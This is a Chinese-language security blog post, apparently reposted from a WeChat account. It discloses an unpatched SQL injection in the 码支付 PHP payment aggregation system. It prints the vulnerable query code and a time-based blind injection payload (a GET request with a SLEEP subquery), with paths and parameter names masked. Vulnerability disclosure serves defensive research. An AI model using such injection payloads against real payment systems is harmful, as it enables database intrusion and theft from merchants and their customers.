【0day】码支付系统存在前台SQL注入漏洞

admin 2025年2月10日15:02:37评论34 views字数 721阅读2分24秒阅读模式

点击上方蓝字关注我们 并设为星标

0x00 前言

    码支付是基于php开发的一套新型聚合收款、聚合支付系统,是一款专业的聚合免签收款系统,无需对接其余平台,个码就可收款,灰常的方便快捷,集成实现三网免挂功能,无需挂繁琐的监控软件就可实现回调,更便捷的监控方式,更优的产品质量.

Fofa指纹 : 请见文末!

【0day】码支付系统存在前台SQL注入漏洞
前台
【0day】码支付系统存在前台SQL注入漏洞
后台
【0day】码支付系统存在前台SQL注入漏洞

0x01 漏洞复现

位于 /***/****/****.php 文件中通过$_REQUEST函数来获取参数***,之后直接被带入到SQL查询字句中,且未加过滤,导致漏洞产生.

<?php
if(!empty($_REQUEST['***'])){
  $appid = $_REQUEST['***'];
}else{exit('***参数不能为空!');}
$result = mysqli_query($link, "SELECT * FROM `box_user` WHERE `mid` = '".$appid."'");
$result = mysqli_fetch_assoc($result);

if($result === null){
exit('商户号不存在!');
}

Payload:

GET /****/****/***?cid='+AND+(SELECT+1537+FROM+(SELECT(SLEEP(5)))VpjZ)--+CSLx HTTP/1.1
Cache-Control: no-cache
Host: 192.168.64.128:81
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

详细POC请见文末!详细POC请见文末!
【0day】码支付系统存在前台SQL注入漏洞

0x02

原文始发于微信公众号(星悦安全):【0day】码支付系统存在前台SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月10日15:02:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【0day】码支付系统存在前台SQL注入漏洞https://cn-sec.com/archives/3722271.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息